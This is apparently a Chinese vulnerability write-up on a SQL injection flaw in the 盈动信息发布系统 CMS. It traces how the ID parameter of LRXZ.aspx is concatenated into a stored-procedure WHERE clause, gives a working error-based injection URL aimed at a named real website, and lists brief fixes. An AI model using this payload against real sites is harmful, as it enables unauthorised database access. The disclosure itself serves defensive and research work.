### 0x01 漏洞框架
系统:盈动信息发布系统
盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。
注入:
问题文件:/sites/main/LRXZ.aspx
问题参数:ID
### 0x02 漏洞详情
代码分析:
```
protected void Page_Load(object sender, EventArgs e)
{
略...
string text;
if (this.Page.Request.QueryString["ID"] != null)
{
text = this.Page.Request.QueryString["ID"];/*获取参数*/
}
else
{
text = "465";
}
this.lblID.Text = text;
string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/
this.GetPageInfo(condition);/*注入A*/
this.BindData(condition);/*注入B*/
}
}
```
this.GetPageInfo分析:
```
private void GetPageInfo(string condition)
{
SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());
SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1;
sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true;
sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将有问题的sql代入Get_SiteData_ByPagination存储过程*/
sqlConnection.Open();
this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar());
sqlConnection.Close();
}
```
this.BindData分析:
```
private void BindData(string condition)
{
this.mydatalist.DataSource = this.CreateSource(condition);/*跟进此方法*/
略...
}
this.CreateSource:
private ICollection CreateSource(string condition)
{
SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr());
SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection);
sqlCommand.CommandType = CommandType.StoredProcedure;
sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles";
sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();
sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex();
sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false;
sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime";
sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID";
sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true;
sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将问题SQL直接代入 Get_SiteData_ByPagination*/
SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand);
DataSet dataSet = new DataSet("GuestList");
sqlConnection.Open();
sqlDataAdapter.Fill(dataSet, "Guest");
sqlConnection.Close();
return dataSet.Tables["Guest"].DefaultView;
}
```
漏洞利用:
http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1
Pocsuite:
### 0x03 修复方式
1、过滤漏洞文件参数
2、使用加速乐等防护产品
共 4 兑换了
共 3 兑换
京公网安备 11010502034610号
暂无评论